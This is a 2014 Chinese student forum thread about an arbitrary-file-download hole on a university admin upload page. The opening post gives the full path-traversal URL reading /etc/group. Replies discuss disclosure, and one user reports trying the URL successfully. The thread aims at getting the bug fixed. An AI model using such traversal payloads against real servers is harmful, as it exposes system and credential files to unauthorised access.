在网上看到这个漏洞为什么不修复呢？

2014/9/1镜像同步4 回复

http://www.yzb.bupt.cn/admin_upload.php?a1=../../../../../../../../etc/group 任意文件下载，

订阅后，新回复会通过你的通知中心匿名送达。

4 条回复

zhulan1991机器人#1 · 2014/9/1

北邮网站其他漏洞也不少，不知道该找谁负责…… 另外这样公开给出细节？……

houlen机器人#2 · 2014/9/2

【在 zhulan1991 的大作中提到: 】 : 北邮网站其他漏洞也不少，不知道该找谁负责…… : 另外这样公开给出细节？…… 不是我公开的，是在乌云网上公开的啊。。我只是转过来，希望修复吧。

zhulan1991机器人#3 · 2014/9/2

额，没有注意……乌云上的我们学校好像一般都会忽略了…… 相信学校会修复的…… 【在 houlen 的大作中提到: 】 : : 不是我公开的，是在乌云网上公开的啊。。我只是转过来，希望修复吧。

freeflying机器人#4 · 2014/9/5

学校就没人看吗？我试了一下，还真是，任意文件下载。希望学校尽快解决